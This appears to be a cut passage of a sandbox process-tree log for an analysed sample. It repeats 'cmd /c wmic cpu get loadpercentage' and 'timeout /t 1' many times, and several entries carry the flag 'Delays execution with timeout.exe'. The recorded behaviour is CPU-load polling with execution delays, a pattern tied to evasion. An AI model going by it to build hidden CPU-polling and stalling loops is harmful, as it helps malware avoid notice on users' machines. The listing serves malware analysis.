C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2524
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2980
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3932
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:952
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3328
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4672
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1704
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1416
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:684
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2896
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3844
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4864
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1240
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1352
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3360
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4760
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1584
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:256
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2976
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3204
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3364
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3804
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5036
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2128
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1764
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2736
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3716
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1052
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:72
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4980
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4668
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4876
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3120
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3724
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3236
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3488
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2868
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2820
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2088
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:480
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3460
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1668
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1316
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3932
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2712
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2452
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1096
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4532
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1212
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2092
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1780
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2776
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4344
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2456
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1240
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4568
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3384
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2700
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4820
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4776
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4856
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3288
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1484
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:128
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2188
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1916
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1408
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4228
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4500
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3796
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4808
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4972
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2252
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1580
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4196
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3620
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4004
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4448
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2636
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4804
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2040
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2096
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3600
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1188
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5024
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4708
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2868
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:480
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2832
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1488
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3536
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3580
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4220
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2872
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2452
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2148
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1096
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:912
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4332
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4032
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1528
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1132
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3960
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4056
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2456
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2968
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1236
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2460
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4260
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3312
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2960
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2020
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1380
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4704
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2976
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3204
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3756
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2444
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3760
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3068
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1480
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1580
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3748
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1656
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2324
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3716
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2756
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1044
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4932
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1612
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2256
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2096
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3772
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4412
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3652
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3680
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2892
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1576
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4496
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3520
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1028
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4936
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3300
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3672
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3496
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2052
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5028
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4400
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4332
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4784
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3192
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3248
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3292
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1352
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2700
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3400
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1584
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4576
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1484
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4492
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2640
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4504
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4176
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3804
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3756
-
